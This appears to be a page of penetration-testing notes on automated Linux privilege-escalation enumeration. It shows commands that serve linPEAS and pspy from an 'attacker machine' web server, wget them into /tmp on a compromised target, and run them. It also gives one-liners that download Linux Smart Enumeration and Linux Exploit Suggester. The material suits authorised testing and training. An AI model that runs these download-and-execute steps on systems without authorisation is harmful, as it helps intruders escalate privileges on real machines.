Automated Tools

Linpeas.sh

Source: PEASS-ng/linPEAS at master · carlospolop/PEASS-ng · GitHub

Process:

Make sure you are still on the target machine’s shell from the Exploitation phase.
Download and save linPEAS in a folder.
Run a python webserver on the attacker machine on the folder where linpeas is stored.
Download linpeas.sh on the target machine.
Run linpeas.sh on the target machine.
Review the result from linpeas.

# A quick way to transfer files from attacker to target machine
# Attacker Machine
python3 -m http.server 80

# Target Machine
cd /tmp
# wget http://[Attacker IP]/[file]
wget <http://10.1.1.4/linpeas.sh>

# Add execute permission
chmod +x linpeas.sh

# Run linpeas
./linpeas.sh

PSPY

Source: GitHub - DominicBreuker/pspy: Monitor linux processes without root permissions

Process

Download the pspy64
CD to /tmp directory
Deliver pspy64 using python http server
Add execute permission
Run pspy64

# Target machine
cd /tmp
wget <http://10.1.1.4/>
chmod +x pspy64
./pspy64

Linux Smart Enumeration

One Liner

wget "<https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh>" -O lse.sh;chmod 700 lse.sh

curl "<https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh>" -Lo lse.sh;chmod 700 lse.sh

Linux Exploit Suggester

One Liner

wget <https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh> -O les.sh

PreviousEnumeration NextPrivilege Escalation Attacks

Last updated 6 months ago